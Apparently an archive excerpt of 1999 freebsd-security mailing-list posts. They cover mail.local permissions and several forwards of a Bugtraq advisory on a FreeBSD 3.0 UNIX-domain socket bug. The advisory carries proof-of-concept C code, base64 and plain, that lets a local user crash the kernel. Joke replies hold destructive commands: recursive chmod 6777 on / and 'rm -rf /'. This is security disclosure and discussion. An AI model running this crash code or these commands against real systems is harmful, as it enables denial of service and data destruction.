6.5(.3) machine but it survived without problem. Which version of IRIX have been affected? What is the expected effect? Thanks in advance, Milon Papezik -- papezik@pvt.net To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 7:22:47 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 5B57F14EF0 for ; Thu, 6 May 1999 07:22:43 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id HAA03759; Thu, 6 May 1999 07:23:22 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda03757; Thu May 6 07:23:02 1999 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.9.3/8.9.1) id HAA41839; Thu, 6 May 1999 07:22:18 -0700 (PDT) Message-Id: <199905061422.HAA41839@passer.osg.gov.bc.ca> Received: from localhost.osg.gov.bc.ca(127.0.0.1), claiming to be "passer.osg.gov.bc.ca" via SMTP by localhost.osg.gov.bc.ca, id smtpdT41835; Thu May 6 07:21:54 1999 Reply-To: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 3.1-RELEASE X-Mailer: MH 6.8.4, Exmh 2.0.2 X-Sender: cschuber To: Deepwell Internet Cc: freebsd-security@FreeBSD.ORG Subject: Re: Does mail.local need to be setuid-root? In-reply-to: Your message of "Fri, 30 Apr 1999 10:34:16 PDT." <4.1.19990430103009.012536c0@mail1.dcomm.net> Date: Thu, 06 May 1999 07:21:54 -0700 From: Cy Schubert Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org You are correct, however a better approach would be "rm -rf /", as it would take less time to complete and it would remove any possibility of users filling your disk. You would also have the added benefit of having a system that would be almost impossible to break into. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "Take Leykis 101, for gods's sake." In message <4.1.19990430103009.012536c0@mail1.dcomm.net>, Deepwell Internet wri tes: > I prefer all my files, executables and data to be SUID root. I'm even > including a small script to aid in this. Good luck! > > #!/bin/sh > cd / > chown -R root:wheel / > chmod -R 6777 / > echo 'done' > > > > > At 10:05 AM 4/30/99 -0700, you wrote: > >In message >pm.es>, "Pe > >dro J. Lobo" writes: > >> Hello, people. > >> > >> I have a 3.1-RELEASE machine which, among other tasks, acts as a mail and > >> telnet server for out students. Recently I noticed that several users were > >> using more disk space than his quotas should allow (!). After a bit of > >> investigation, I have traced down the problem to the mail system. > >> > >> The problem is that you cand send mail to a user that is over quota, and > >> the system will append the new message to its inbox (located in /var/mail, > >> as by default). Indeed, root can append data to a file that belongs to a > >> user that is over quota. > >> > >> As you may see, it is a rather ugly "feature". So, the question is: does > >> /usr/libexec/mail.local need to be setuid root? Or, alternatively, can I > >> use /usr/bin/mail as the local mailer? I also administer an alpha with > >> Tru64 Unix 4.0d and it uses /bin/mail (no setuid/setgid) as the local > >> mailer. > > > >The main difference between DU and FreeBSD is: > > > >DU 4.0D: > >OSF1 hostname V4.0 878 alpha > >drwxrwxrwt 2 root mail 512 Apr 26 00:00 > >/var/spool/mail > >lrwxrwxrwx 1 root system 7 Dec 9 14:16 /bin -> > >usr/bin > >-rws--x--x 2 root bin 40960 Dec 29 1997 /usr/bin/mail > > > >FreeBSD 3.1R: > >FreeBSD hostname 3.1-RELEASE FreeBSD 3.1-RELEASE #0: Thu Apr 8 > >16:05:54 PDT 1999 root@hostname:/opt/usr_src-310/sys/compile/HOS > >TNAME i386 > >drwxrwxr-x 2 root mail 512 Apr 30 09:41 /var/mail > >-r-sr-xr-x 1 root wheel 15056 Mar 2 06:53 /usr/libexec/mail.loca > >l > > > >Solaris 2.6 (for good measure): > >SunOS HOSTNAME 5.6 Generic_105181-12 sun4u sparc SUNW,Ultra-Enterpri > >se > >drwxrwxrwt 3 root mail 512 Apr 29 23:45 /var/mail > >-r-x--s--x 1 bin mail 64376 Jul 15 1997 /bin/mail > > > >You can resolve your issue by making mail.local sgid mail instead > >of suid root. Ownership of individual mail files cannot be set by > >mail.local when its sgid mail, so you will need to create each > >individual user's mail spool file with the proper permissions 660 > >and ownership before they can receive mail. If mail.local is the > >only sgid mail application on your system, using sgid mail > >shouldn't be any less secure (from a privacy point of view) than > >the stock-out-of-the-box setup. > > > > > >Regards, Phone: (250)387-8437 > >Cy Schubert Fax: (250)387-5766 > >Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca > >ITSD Cy.Schubert@gems8.gov.bc.ca > >Province of BC > > "e**(i*pi)+1=0" > > > > > > > > > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 11:38:15 1999 Delivered-To: freebsd-security@freebsd.org Received: from verdi.nethelp.no (verdi.nethelp.no [158.36.41.162]) by hub.freebsd.org (Postfix) with SMTP id 5FC3E14C48 for ; Thu, 6 May 1999 11:38:04 -0700 (PDT) (envelope-from sthaug@nethelp.no) Received: (qmail 13869 invoked by uid 1001); 6 May 1999 18:38:00 +0000 (GMT) To: security@freebsd.org Subject: Forward: KKIS.05051999.003b From: sthaug@nethelp.no X-Mailer: Mew version 1.05+ on Emacs 19.34.2 Mime-Version: 1.0 Content-Type: Multipart/Mixed; boundary="--Next_Part(Thu_May__6_20:37:58_1999)--" Date: Thu, 06 May 1999 20:38:00 +0200 Message-ID: <13867.926015880@verdi.nethelp.no> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ----Next_Part(Thu_May__6_20:37:58_1999)-- Content-Type: Text/Plain; charset=us-ascii Just saw this on Bugtraq. Unable to reproduce it on 3.1-STABLE from 14. april. Steinar Haug, Nethelp consulting, sthaug@nethelp.no ----Next_Part(Thu_May__6_20:37:58_1999)-- Content-Type: Message/rfc822 Return-Path: Delivered-To: sthaug@NETHELP.NO Received: (qmail 13276 invoked from network); 6 May 1999 17:49:49 +0000 (GMT) Received: from segate.sunet.se (192.36.125.6) by verdi.nethelp.no with SMTP; 6 May 1999 17:49:49 +0000 (GMT) Received: from segate.sunet.se (192.36.125.16) by SEGATE.SUNET.SE (LSMTP for OpenVMS v1.1a) with SMTP id <10.F91D42BE@SEGATE.SUNET.SE>; Thu, 6 May 1999 18:51:54 +0100 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8d) with spool id 573208 for BUGTRAQ@NETSPACE.ORG; Thu, 6 May 1999 17:44:01 +0000 Approved-By: aleph1@UNDERGROUND.ORG Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by netspace.org (8.8.7/8.8.7) with ESMTP id FAA21128 for ; Wed, 5 May 1999 05:22:29 -0400 Received: from nova.kki.krakow.pl (nova.kki.krakow.pl [195.116.9.2]) by nova.kki.krakow.pl (8.8.7/Ver.2c) with ESMTP id LAA18201 for ; Wed, 5 May 1999 11:26:21 +0200 X-Sender: lluzar@nova.kki.krakow.pl MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="1958937097-2116286281-925896381=:17696" Message-ID: Date: Wed, 5 May 1999 11:26:21 +0200 Reply-To: Lukasz Luzar Sender: Bugtraq List From: Lukasz Luzar Subject: KKIS.05051999.003b To: BUGTRAQ@NETSPACE.ORG This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1958937097-2116286281-925896381=:17696 Content-Type: TEXT/PLAIN; charset=US-ASCII ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ KKI Security Team Cracow Commercial Internet http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Report title : Security problem with sockets in FreeBSD's implementation of UNIX-domain protocol family. Problem found by : Lukasz Luzar (lluzar@security.kki.pl) Report created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Raport published : 5th May 1999 Raport code : KKIS.05051999.003.b Systems affected : FreeBSD-3.0 and maybe 3.1, Archive : http://www.security.kki.pl/advisories/ Risk level : high ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As you know, "The UNIX-domain protocol family is a collection of protocols that provides local interprocess communication through the normal socket mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses filesystem pathnames for addressing." The SOCK_STREAM sockets also supports the communication of UNIX file descriptors through the use of functions sendmsg() and recvmsg(). While testing UNIX-domain protocols, we have found probable bug in FreeBSD's implementation of this mechanism. When we had run attached example on FreeBSD-3.0 as local user, system had crashed imediatelly with error "Supervisor read, page not present" in kernel mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Look to attached example. ~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --1958937097-2116286281-925896381=:17696 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="example.c" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: Content-Disposition: attachment; filename="example.c" I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQoj aW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPHN5cy91bi5oPg0K I2luY2x1ZGUgPGZjbnRsLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQoNCiNk ZWZpbmUgUEFUSCAiL3RtcC8xMjMiDQojZGVmaW5lIFBBVEhfVE1QICIvdG1w LzEyMy50bXAiDQojZGVmaW5lIFNPTUVfRklMRSAiL2V0Yy9wYXNzd2QiDQoN CnN0cnVjdCBteWNtc2doZHIgew0KCXN0cnVjdCBjbXNnaGRyIGhkcjsNCglp bnQJZmQ7DQp9Ow0KDQpleHRlcm4gZXJybm87DQoNCnZvaWQgc2VydmVyKCk7 DQp2b2lkIGNsaWVudCgpOw0KDQp2b2lkIG1haW4oKQ0Kew0KCXN3aXRjaCAo IGZvcmsoKSkgew0KCWNhc2UgLTE6DQoJCXByaW50ZiggImZvcmsgZXJyb3Ig JWRcbiIsZXJybm8pOw0KCQlicmVhazsNCgljYXNlIDA6DQoJCWZvciAoOzsp IGNsaWVudCgpOw0KCWRlZmF1bHQ6DQoJCXNlcnZlcigpOw0KCX0NCn0NCg0K dm9pZCBzZXJ2ZXIoKQ0Kew0KCXN0cnVjdCBzb2NrYWRkcl91biBhZGRyOw0K CXN0cnVjdCBtc2doZHIgbXltc2doZHI7DQoJc3RydWN0IG15Y21zZ2hkciBh bmNkYnVmOw0KCWNoYXIgCWRhdGFbIDFdOw0KCWludAlzb2NrZmQsDQoJCWxl biwNCgkJZmQ7DQoNCglpZiAoIHVubGluayggUEFUSCkgPT0gLTEpDQoJCXBy aW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglpZiAoKCBz b2NrZmQgPSBzb2NrZXQoIEFGX1VOSVgsU09DS19ER1JBTSwwKSkgPT0gLTEp DQoJCXByaW50ZiggInNvY2tldCBlcnJvciAlZFxuIixlcnJubyk7DQoNCglz dHJjcHkoIGFkZHIuc3VuX3BhdGgsUEFUSCk7DQoJYWRkci5zdW5fbGVuID0g c2l6ZW9mKCBhZGRyLnN1bl9sZW4pICsgc2l6ZW9mKCBhZGRyLnN1bl9mYW1p bHkpIA0KCQkJKyBzdHJsZW4oIGFkZHIuc3VuX3BhdGgpOyANCglhZGRyLnN1 bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5kKCBzb2NrZmQsKHN0 cnVjdCBzb2NrYWRkciAqKSAmYWRkcixhZGRyLnN1bl9sZW4pID09IC0xKQ0K CQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCWZvciAo OzspIHsNCg0KCQlpZiAoKCBmZCA9IG9wZW4oIFNPTUVfRklMRSxPX1JET05M WSkpID09IC0xKSANCgkJCXByaW50ZiggIm9wZW4gZmlsZSBlcnJvciAlZFxu IixlcnJubyk7DQoNCgkJbGVuID0gc2l6ZW9mKCBhZGRyLnN1bl9wYXRoKTsN Cg0KCQlpZiAoIHJlY3Zmcm9tKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBkYXRh KSwwLA0KCQkJKHN0cnVjdCBzb2NrYWRkciAqKSAmYWRkciwmbGVuKSA9PSAt MSkgDQoJCQlwcmludGYoICJyZWN2ZnJvbSBlcnJvciAlZFxuIixlcnJubyk7 DQoNCgkJYW5jZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYp Ow0KCQlhbmNkYnVmLmhkci5jbXNnX2xldmVsID0gU09MX1NPQ0tFVDsNCgkJ YW5jZGJ1Zi5oZHIuY21zZ190eXBlID0gU0NNX1JJR0hUUzsNCgkJYW5jZGJ1 Zi5mZCA9IGZkOw0KDQoJCW15bXNnaGRyLm1zZ19uYW1lID0gKGNhZGRyX3Qp ICZhZGRyOw0KCQlteW1zZ2hkci5tc2dfbmFtZWxlbiA9IGxlbjsNCgkJbXlt c2doZHIubXNnX2lvdiA9IE5VTEw7DQoJCW15bXNnaGRyLm1zZ19pb3ZsZW4g PSAwOw0KCQlteW1zZ2hkci5tc2dfY29udHJvbCA9IChjYWRkcl90KSAmYW5j ZGJ1ZjsNCgkJbXltc2doZHIubXNnX2NvbnRyb2xsZW4gPSBhbmNkYnVmLmhk ci5jbXNnX2xlbjsNCgkJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCgkJDQoJ CWlmICggc2VuZG1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkgDQoJ CQlwcmludGYoICJzZW5kbXNnIGVycm9yICVkXG4iLGVycm5vKTsNCg0KCQlj bG9zZSggZmQpOw0KCX0NCn0NCg0Kdm9pZCBjbGllbnQoKQ0Kew0KCXN0cnVj dCBzb2NrYWRkcl91bglhZGRyX3MsDQoJCQkJYWRkcl9jOw0KCXN0cnVjdCBt eWNtc2doZHIJYW5jZGJ1ZjsNCglzdHJ1Y3QgbXNnaGRyCQlteW1zZ2hkcjsN CgljaGFyIAlkYXRhWyAxXTsNCglpbnQJc29ja2ZkLA0KCQlsZW4sDQoJCWZk Ow0KDQoJaWYgKCggc29ja2ZkID0gc29ja2V0KCBBRl9VTklYLFNPQ0tfREdS QU0sMCkpID09IC0xKSANCgkJcHJpbnRmKCAic29ja2V0IGVycm9yICVkXG4i LGVycm5vKTsNCg0KCWlmICggdW5saW5rKCBQQVRIX1RNUCkgPT0gLTEpDQoJ CXByaW50ZiggInVubGluayBlcnJvciAlZFxuIixlcnJubyk7DQoNCglzdHJj cHkoIGFkZHJfYy5zdW5fcGF0aCxQQVRIX1RNUCk7DQoJYWRkcl9jLnN1bl9s ZW4gPSBzaXplb2YoIGFkZHJfYy5zdW5fbGVuKSArIHNpemVvZihhZGRyX2Mu c3VuX2ZhbWlseSkgDQoJCQkgICsgc3RybGVuKCBhZGRyX2Muc3VuX3BhdGgp Ow0KCWFkZHJfYy5zdW5fZmFtaWx5ID0gQUZfVU5JWDsNCg0KCXN0cmNweSgg YWRkcl9zLnN1bl9wYXRoLFBBVEgpOw0KCWFkZHJfcy5zdW5fbGVuID0gc2l6 ZW9mKCBhZGRyX3Muc3VuX2xlbikgKyBzaXplb2YoYWRkcl9zLnN1bl9mYW1p bHkpDQoJCSAgICAgICAgICAgKyBzdHJsZW4oIGFkZHJfcy5zdW5fcGF0aCk7 DQoJYWRkcl9zLnN1bl9mYW1pbHkgPSBBRl9VTklYOw0KDQoJaWYgKCBiaW5k KCBzb2NrZmQsKHN0cnVjdCBzb2NrYWRkciopICZhZGRyX2MsYWRkcl9jLnN1 bl9sZW4pID09IC0xKQ0KCQlwcmludGYoICJiaW5kIGVycm9yICVkXG4iLGVy cm5vKTsNCg0KCWlmICggc2VuZHRvKCBzb2NrZmQsJmRhdGEsc2l6ZW9mKCBk YXRhKSwwLChzdHJ1Y3Qgc29ja2FkZHIgKikgJmFkZHJfcywNCgkJYWRkcl9z LnN1bl9sZW4pID09IC0xKSANCgkJcHJpbnRmKCAic2VuZHRvIGVycm9yICVk XG4iLGVycm5vKTsNCg0KCWxlbiA9IGFkZHJfcy5zdW5fbGVuOw0KDQoJYW5j ZGJ1Zi5oZHIuY21zZ19sZW4gPSBzaXplb2YoIGFuY2RidWYpOw0KCWFuY2Ri dWYuaGRyLmNtc2dfbGV2ZWwgPSBTT0xfU09DS0VUOw0KCWFuY2RidWYuaGRy LmNtc2dfdHlwZSA9IFNDTV9SSUdIVFM7DQoNCglteW1zZ2hkci5tc2dfbmFt ZSA9IE5VTEw7DQoJbXltc2doZHIubXNnX25hbWVsZW4gPSAwOw0KCW15bXNn aGRyLm1zZ19pb3YgPSBOVUxMOw0KCW15bXNnaGRyLm1zZ19pb3ZsZW4gPSAw Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sID0gKGNhZGRyX3QpICZhbmNkYnVm Ow0KCW15bXNnaGRyLm1zZ19jb250cm9sbGVuID0gYW5jZGJ1Zi5oZHIuY21z Z19sZW47DQoJbXltc2doZHIubXNnX2ZsYWdzID0gMDsNCg0KCWlmICggcmVj dm1zZyggc29ja2ZkLCZteW1zZ2hkciwwKSA9PSAtMSkNCgkJcHJpbnRmKCAi cmVjdm1zZyBlcnJvciAlZFxuIixlcnJubyk7DQoNCglmZCA9IGFuY2RidWYu ZmQ7DQoJDQoJY2xvc2UoZmQpOw0KCWNsb3NlKCBzb2NrZmQpOw0KfQ0K --1958937097-2116286281-925896381=:17696-- ----Next_Part(Thu_May__6_20:37:58_1999)---- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 12:13:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from stage1.thirdage.com (stage1.thirdage.com [4.18.197.236]) by hub.freebsd.org (Postfix) with ESMTP id 604AE14BFC for ; Thu, 6 May 1999 12:13:37 -0700 (PDT) (envelope-from jal@thirdage.com) Received: from budd ([4.18.197.220]) by stage1.thirdage.com (8.9.1/8.9.1) with SMTP id MAA05163 for ; Thu, 6 May 1999 12:12:28 -0700 (PDT) Message-Id: <4.1.19990506121618.050a5aa0@mail.thirdage.com> X-Sender: jal@mail.thirdage.com X-Mailer: QUALCOMM Windows Eudora Pro Version 4.1 Date: Thu, 06 May 1999 12:16:37 -0700 To: security@freebsd.org From: Jamie Lawrence Subject: Fwd: KKIS.05051999.003b Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="=====================_1188480344==_" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --=====================_1188480344==_ Content-Type: text/plain; charset="us-ascii" >Approved-By: aleph1@UNDERGROUND.ORG >X-Sender: lluzar@nova.kki.krakow.pl >Date: Wed, 5 May 1999 11:26:21 +0200 >Reply-To: Lukasz Luzar >Sender: Bugtraq List >From: Lukasz Luzar >Subject: KKIS.05051999.003b >To: BUGTRAQ@netspace.org > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > ### ### ### ### ### > ### ### ### ### ### > ###### ###### ### > ### ### ### ### ### > ### ### ### ### ### > > S E C U R I T Y > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > KKI Security Team Cracow Commercial Internet > http://www.security.kki.pl http://www.kki.pl > mailto:security@security.kki.pl mailto:biuro@kki.pl > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Report title : Security problem with sockets in FreeBSD's > implementation of UNIX-domain protocol family. > Problem found by : Lukasz Luzar (lluzar@security.kki.pl) > Report created by : Robert Pajak (shadow@security.kki.pl) > Lukasz Luzar (lluzar@security.kki.pl) > Raport published : 5th May 1999 > Raport code : KKIS.05051999.003.b > Systems affected : FreeBSD-3.0 and maybe 3.1, > Archive : http://www.security.kki.pl/advisories/ > Risk level : high > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > As you know, "The UNIX-domain protocol family is a collection of protocols > that provides local interprocess communication through the normal socket > mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses > filesystem pathnames for addressing." > The SOCK_STREAM sockets also supports the communication of UNIX file > descriptors through the use of functions sendmsg() and recvmsg(). > While testing UNIX-domain protocols, we have found probable bug in > FreeBSD's implementation of this mechanism. > When we had run attached example on FreeBSD-3.0 as local user, system > had crashed imediatelly with error "Supervisor read, page not present" > in kernel mode. > >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Look to attached example. > >~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > Copyright (c) 1999 KKI Security Team, Poland > All rights reserved. > > All questions please address to mailto:security@security.kki.pl >~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ > > --=====================_1188480344==_ Content-Type: text/plain; charset="us-ascii" Content-Disposition: attachment; filename="example1.c" #include #include #include #include #include #include #define PATH "/tmp/123" #define PATH_TMP "/tmp/123.tmp" #define SOME_FILE "/etc/passwd" struct mycmsghdr { struct cmsghdr hdr; int fd; }; extern errno; void server(); void client(); void main() { switch ( fork()) { case -1: printf( "fork error %d\n",errno); break; case 0: for (;;) client(); default: server(); } } void server() { struct sockaddr_un addr; struct msghdr mymsghdr; struct mycmsghdr ancdbuf; char data[ 1]; int sockfd, len, fd; if ( unlink( PATH) == -1) printf( "unlink error %d\n",errno); if (( sockfd = socket( AF_UNIX,SOCK_DGRAM,0)) == -1) printf( "socket error %d\n",errno); strcpy( addr.sun_path,PATH); addr.sun_len = sizeof( addr.sun_len) + sizeof( addr.sun_family) + strlen( addr.sun_path); addr.sun_family = AF_UNIX; if ( bind( sockfd,(struct sockaddr *) &addr,addr.sun_len) == -1) printf( "bind error %d\n",errno); for (;;) { if (( fd = open( SOME_FILE,O_RDONLY)) == -1) printf( "open file error %d\n",errno); len = sizeof( addr.sun_path); if ( recvfrom( sockfd,&data,sizeof( data),0, (struct sockaddr *) &addr,&len) == -1) printf( "recvfrom error %d\n",errno); ancdbuf.hdr.cmsg_len = sizeof( ancdbuf); ancdbuf.hdr.cmsg_level = SOL_SOCKET; ancdbuf.hdr.cmsg_type = SCM_RIGHTS; ancdbuf.fd = fd; mymsghdr.msg_name = (caddr_t) &addr; mymsghdr.msg_namelen = len; mymsghdr.msg_iov = NULL; mymsghdr.msg_iovlen = 0; mymsghdr.msg_control = (caddr_t) &ancdbuf; mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len; mymsghdr.msg_flags = 0; if ( sendmsg( sockfd,&mymsghdr,0) == -1) printf( "sendmsg error %d\n",errno); close( fd); } } void client() { struct sockaddr_un addr_s, addr_c; struct mycmsghdr ancdbuf; struct msghdr mymsghdr; char data[ 1]; int sockfd, len, fd; if (( sockfd = socket( AF_UNIX,SOCK_DGRAM,0)) == -1) printf( "socket error %d\n",errno); if ( unlink( PATH_TMP) == -1) printf( "unlink error %d\n",errno); strcpy( addr_c.sun_path,PATH_TMP); addr_c.sun_len = sizeof( addr_c.sun_len) + sizeof(addr_c.sun_family) + strlen( addr_c.sun_path); addr_c.sun_family = AF_UNIX; strcpy( addr_s.sun_path,PATH); addr_s.sun_len = sizeof( addr_s.sun_len) + sizeof(addr_s.sun_family) + strlen( addr_s.sun_path); addr_s.sun_family = AF_UNIX; if ( bind( sockfd,(struct sockaddr*) &addr_c,addr_c.sun_len) == -1) printf( "bind error %d\n",errno); if ( sendto( sockfd,&data,sizeof( data),0,(struct sockaddr *) &addr_s, addr_s.sun_len) == -1) printf( "sendto error %d\n",errno); len = addr_s.sun_len; ancdbuf.hdr.cmsg_len = sizeof( ancdbuf); ancdbuf.hdr.cmsg_level = SOL_SOCKET; ancdbuf.hdr.cmsg_type = SCM_RIGHTS; mymsghdr.msg_name = NULL; mymsghdr.msg_namelen = 0; mymsghdr.msg_iov = NULL; mymsghdr.msg_iovlen = 0; mymsghdr.msg_control = (caddr_t) &ancdbuf; mymsghdr.msg_controllen = ancdbuf.hdr.cmsg_len; mymsghdr.msg_flags = 0; if ( recvmsg( sockfd,&mymsghdr,0) == -1) printf( "recvmsg error %d\n",errno); fd = ancdbuf.fd; close(fd); close( sockfd); } --=====================_1188480344==_-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu May 6 13:10:52 1999 Delivered-To: freebsd-security@freebsd.org Received: from helios.man.lublin.pl (helios.man.lublin.pl [194.92.17.34]) by hub.freebsd.org (Postfix) with ESMTP id F04BF14BD3 for ; Thu, 6 May 1999 13:10:47 -0700 (PDT) (envelope-from sopel@nemezis.ipan.lublin.pl) Received: from nemezis.ipan.lublin.pl ([193.59.19.154]:1870 "EHLO nemezis.ipan.lublin.pl" ident: "sopel") by helios.man.lublin.pl with ESMTP id <5384-862>; Thu, 6 May 1999 22:10:35 +0200 Date: Thu, 6 May 1999 22:11:35 +0000 (GMT) From: Wojtek To: freebsd-security@freebsd.org Subject: KKIS.05051999.003b (fwd) Message-ID: MIME-Version: 1.0 Content-Type: MULTIPART/MIXED; BOUNDARY="1958937097-2116286281-925896381=:17696" Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This message is in MIME format. The first part should be readable text, while the remaining parts are likely unreadable without MIME-aware tools. Send mail to mime@docserver.cac.washington.edu for more info. --1958937097-2116286281-925896381=:17696 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: have a look at this. ---------- Forwarded message ---------- Date: Wed, 5 May 1999 11:26:21 +0200 From: Lukasz Luzar To: BUGTRAQ@NETSPACE.ORG Subject: KKIS.05051999.003b ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ### ### ### ### ### ### ### ### ### ### ###### ###### ### ### ### ### ### ### ### ### ### ### ### S E C U R I T Y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ KKI Security Team Cracow Commercial Internet http://www.security.kki.pl http://www.kki.pl mailto:security@security.kki.pl mailto:biuro@kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Informations ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Report title : Security problem with sockets in FreeBSD's implementation of UNIX-domain protocol family. Problem found by : Lukasz Luzar (lluzar@security.kki.pl) Report created by : Robert Pajak (shadow@security.kki.pl) Lukasz Luzar (lluzar@security.kki.pl) Raport published : 5th May 1999 Raport code : KKIS.05051999.003.b Systems affected : FreeBSD-3.0 and maybe 3.1, Archive : http://www.security.kki.pl/advisories/ Risk level : high ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ As you know, "The UNIX-domain protocol family is a collection of protocols that provides local interprocess communication through the normal socket mechanism. It supports the SOCK_STREAM and SOCK_DGRAM soceket types and uses filesystem pathnames for addressing." The SOCK_STREAM sockets also supports the communication of UNIX file descriptors through the use of functions sendmsg() and recvmsg(). While testing UNIX-domain protocols, we have found probable bug in FreeBSD's implementation of this mechanism. When we had run attached example on FreeBSD-3.0 as local user, system had crashed imediatelly with error "Supervisor read, page not present" in kernel mode. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Look to attached example. ~~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright (c) 1999 KKI Security Team, Poland All rights reserved. All questions please address to mailto:security@security.kki.pl ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --1958937097-2116286281-925896381=:17696 